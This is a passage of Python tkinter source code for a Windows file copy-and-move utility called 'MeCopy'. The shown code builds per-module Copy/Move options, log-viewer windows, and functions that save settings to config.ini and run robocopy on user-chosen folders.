Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_1, value=1).place(x=560, y=35)
RadioValue_2 = tk.IntVar()
Copy_Files_Option_2 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_2, value=0).place(x=500, y=148)
Move_Files_Option_2 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_2, value=1).place(x=560, y=148)
RadioValue_3 = tk.IntVar()
Copy_Files_Option_3 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_3, value=0).place(x=500, y=261)
Move_Files_Option_3 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_3, value=1).place(x=560, y=261)
RadioValue_4 = tk.IntVar()
Copy_Files_Option_4 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_4, value=0).place(x=500, y=374)
Move_Files_Option_4 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_4, value=1).place(x=560, y=374)
RadioValue_5 = tk.IntVar()
Copy_Files_Option_5 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_5, value=0).place(x=500, y=487)
Move_Files_Option_5 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_5, value=1).place(x=560, y=487)
RadioValue_6 = tk.IntVar()
Copy_Files_Option_6 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_6, value=0).place(x=1088, y=35)
Move_Files_Option_6 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_6, value=1).place(x=1148, y=35)
RadioValue_7 = tk.IntVar()
Copy_Files_Option_7 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_7, value=0).place(x=1088, y=148)
Move_Files_Option_7 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_7, value=1).place(x=1148, y=148)
RadioValue_8 = tk.IntVar()
Copy_Files_Option_8 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_8, value=0).place(x=1088, y=261)
Move_Files_Option_8 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_8, value=1).place(x=1148, y=261)
RadioValue_9 = tk.IntVar()
Copy_Files_Option_9 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_9, value=0).place(x=1088, y=374)
Move_Files_Option_9 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_9, value=1).place(x=1148, y=374)
RadioValue_10 = tk.IntVar()
Copy_Files_Option_10 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_10, value=0).place(x=1088, y=487)
Move_Files_Option_10 = tk.Radiobutton(
Move_Frame, text="Move", bg="#dbdbdb", variable=RadioValue_10, value=1).place(x=1148, y=487)
# TRANSFERING_TYPES_END
# LOGS_GENERATING
def Log_Copy_1():
Module_Name = Move_Module_Name_1.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 1] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_1_" + Move_Module_Name_1.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_1():
Module_Name = Move_Module_Name_1.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 1] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_1_" + Move_Module_Name_1.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_2():
Module_Name = Move_Module_Name_2.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 2] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_2_" + Move_Module_Name_2.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_2():
Module_Name = Move_Module_Name_2.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 2] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_2_" + Move_Module_Name_2.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_3():
Module_Name = Move_Module_Name_3.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 3] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_3_" + Move_Module_Name_3.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_3():
Module_Name = Move_Module_Name_3.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 3] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_3_" + Move_Module_Name_3.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_4():
Module_Name = Move_Module_Name_4.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 4] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_4_" + Move_Module_Name_4.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_4():
Module_Name = Move_Module_Name_4.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 4] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_4_" + Move_Module_Name_4.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_5():
Module_Name = Move_Module_Name_5.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 5] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_5_" + Move_Module_Name_5.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_5():
Module_Name = Move_Module_Name_5.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 5] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_5_" + Move_Module_Name_5.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_6():
Module_Name = Move_Module_Name_6.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 6] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_6_" + Move_Module_Name_6.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_6():
Module_Name = Move_Module_Name_6.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 6] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_6_" + Move_Module_Name_6.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_7():
Module_Name = Move_Module_Name_7.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 7] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_7_" + Move_Module_Name_7.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_7():
Module_Name = Move_Module_Name_7.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 7] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_7_" + Move_Module_Name_7.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_8():
Module_Name = Move_Module_Name_8.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 8] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_8_" + Move_Module_Name_8.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_8():
Module_Name = Move_Module_Name_8.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 8] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_8_" + Move_Module_Name_8.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_9():
Module_Name = Move_Module_Name_9.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 9] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_9_" + Move_Module_Name_9.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_9():
Module_Name = Move_Module_Name_9.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 9] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_9_" + Move_Module_Name_9.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Copy_10():
Module_Name = Move_Module_Name_10.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Copy [Module 10] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Copy_10_" + Move_Module_Name_10.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
def Log_Move_10():
Module_Name = Move_Module_Name_10.get()
window_Log = tk.Toplevel(root)
window_Log.title(Module_Name + " - Move [Module 10] LOG")
window_Log.config(bg="#dbdbdb")
window_Log.geometry("810x500+270+110")
window_Log.resizable(False, False)
window_Log.iconbitmap("icon.ico")
scroll = tk.Scrollbar(window_Log)
scroll.pack(side=tk.RIGHT, fill=tk.Y)
with open(r"logs\Log_Move_10_" + Move_Module_Name_10.get() + ".txt", "r") as Log_Open:
Log = tk.Text(window_Log, yscrollcommand=scroll.set,
height=800, width=500)
Log.pack()
Log.insert(tk.END, Log_Open.read())
Log.config(state=tk.DISABLED)
scroll.config(command=Log.yview)
# LOGS_GENERATING_END
# TRANSFER_MODULE
def Transfer_Module_1():
parser.set("Paths_Src", "path_1", Src_Path_1.get())
parser.set("Paths_Dst", "path_1", Dst_Path_1.get())
parser.set("Extensions", "Search_1", Module_1_Extensions.get())
parser.set("Path_Names", "path_name_1", Move_Module_Name_1.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_1.get())
Dst = win32api.GetShortPathName(Dst_Path_1.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_1").split(" ")
if parser.get("Paths_Src", "path_1") == parser.get("Paths_Dst", "path_1"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_1")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_1") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_1") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=82, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=490, y=60)
if RadioValue_1.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_1_" + Move_Module_Name_1.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_1()
if RadioValue_1.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_1_" + Move_Module_Name_1.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_1()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=80)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_1")+" is misspelled or do not exist.", title="MeCopy")
pass
def Transfer_Module_2():
parser.set("Paths_Src", "path_2", Src_Path_2.get())
parser.set("Paths_Dst", "path_2", Dst_Path_2.get())
parser.set("Extensions", "Search_2", Module_2_Extensions.get())
parser.set("Path_Names", "path_name_2", Move_Module_Name_2.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_2.get())
Dst = win32api.GetShortPathName(Dst_Path_2.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_2").split(" ")
if parser.get("Paths_Src", "path_2") == parser.get("Paths_Dst", "path_2"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_2")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_2") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_2") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=195, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=490, y=174)
if RadioValue_2.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_2_" + Move_Module_Name_2.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_2()
if RadioValue_2.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_2_" + Move_Module_Name_2.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_2()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=193)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_2")+" is misspelled or do not exist.", title="MeCopy")
pass
def Transfer_Module_3():
parser.set("Paths_Src", "path_3", Src_Path_3.get())
parser.set("Paths_Dst", "path_3", Dst_Path_3.get())
parser.set("Extensions", "Search_3", Module_3_Extensions.get())
parser.set("Path_Names", "path_name_3", Move_Module_Name_3.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_3.get())
Dst = win32api.GetShortPathName(Dst_Path_3.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_3").split(" ")
if parser.get("Paths_Src", "path_3") == parser.get("Paths_Dst", "path_3"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_3")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_3") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_3") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=313, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=490, y=290)
if RadioValue_3.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_3_" + Move_Module_Name_3.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_3()
if RadioValue_3.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_3_" + Move_Module_Name_3.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_3()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=309)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_3")+" is misspelled or do not exist.", title="MeCopy")
pass
def Transfer_Module_4():
parser.set("Paths_Src", "path_4", Src_Path_4.get())
parser.set("Paths_Dst", "path_4", Dst_Path_4.get())
parser.set("Extensions", "Search_4", Module_4_Extensions.get())
parser.set("Path_Names", "path_name_4", Move_Module_Name_4.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_4.get())
Dst = win32api.GetShortPathName(Dst_Path_4.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_4").split(" ")
if parser.get("Paths_Src", "path_4") == parser.get("Paths_Dst", "path_4"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_4")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_4") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_4") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=429, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=490, y=406)
if RadioValue_4.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_4_" + Move_Module_Name_4.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_4()
if RadioValue_4.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_4_" + Move_Module_Name_4.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_4()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=428)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_4")+" is misspelled or do not exist.", title="MeCopy")
pass
def Transfer_Module_5():
parser.set("Paths_Src", "path_5", Src_Path_5.get())
parser.set("Paths_Dst", "path_5", Dst_Path_5.get())
parser.set("Extensions", "Search_5", Module_5_Extensions.get())
parser.set("Path_Names", "path_name_5", Move_Module_Name_5.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_5.get())
Dst = win32api.GetShortPathName(Dst_Path_5.get())
Files_Extensions_Read = parser.get(
"Extensions", "Search_5").split(" ")
if parser.get("Paths_Src", "path_5") == parser.get("Paths_Dst", "path_5"):
messagebox.showwarning(message="ATTENTION: Origin and Destination are the same in (" +
parser.get("Path_Names", "path_name_5")+")", title="MeCopy")
sys.exit(0)
if parser.get("Paths_Src", "path_5") == ("C:/"):
Alert_Path = tk.messagebox.askyesno(title="MeCopy", message="ATTENTION: You have chosen as source path C: in (" + parser.get("Path_Names", "path_name_5") +
") This may cause problems when copying your files and some files may not be able to be copied and the operation may take a long time. We recommend that you choose more specific paths. Do you want to continue?")
if Alert_Path is False:
sys.exit(0)
progressbar = ttk.Progressbar(mode="indeterminate")
progressbar.place(x=439, y=545, width=100)
progressbar.start(10)
Transfer_InProcress = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfering...")
Transfer_InProcress.place(x=490, y=522)
if RadioValue_5.get() == 0:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/COPYALL", r"/log:logs\Log_Copy_5_" + Move_Module_Name_5.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Copy_5()
if RadioValue_5.get() == 1:
Call_Move = ["robocopy", Src, Dst, "/S",
"/ZB", "/XJ", "/R:0", "/W:0","/TEE", "/MOVE", r"/log:logs\Log_Move_5_" + Move_Module_Name_5.get() + ".txt"]
Call_Move.extend(Files_Extensions_Read)
call(Call_Move)
Log_Move_5()
progressbar.destroy()
Transfer_InProcress.destroy()
Transfer_Completed = tk.Label(
Move_Frame, bg="#dbdbdb", fg="#382d2b", text="Transfer completed at " + time.strftime("%H:%M:%S"))
Transfer_Completed.place(x=340, y=545)
except WindowsError:
pass
except SyntaxError:
pass
except ValueError:
pass
except TypeError:
pass
except FileNotFoundError:
Path_Error = messagebox.showwarning(
message="Path cannot be found (" + Src + ")", title="MeCopy")
pass
except pywintypes.error:
Path_Error = messagebox.showwarning(message="The source path or destination of "+parser.get(
"Path_Names", "path_name_5")+" is misspelled or do not exist.", title="MeCopy")
pass
def Transfer_Module_6():
parser.set("Paths_Src", "path_6", Src_Path_6.get())
parser.set("Paths_Dst", "path_6", Dst_Path_6.get())
parser.set("Extensions", "Search_6", Module_6_Extensions.get())
parser.set("Path_Names", "path_name_6", Move_Module_Name_6.get())
with open('config.ini', 'w') as myconfig:
parser.write(myconfig)
try:
Src = win32api.GetShortPathName(Src_Path_6.get())
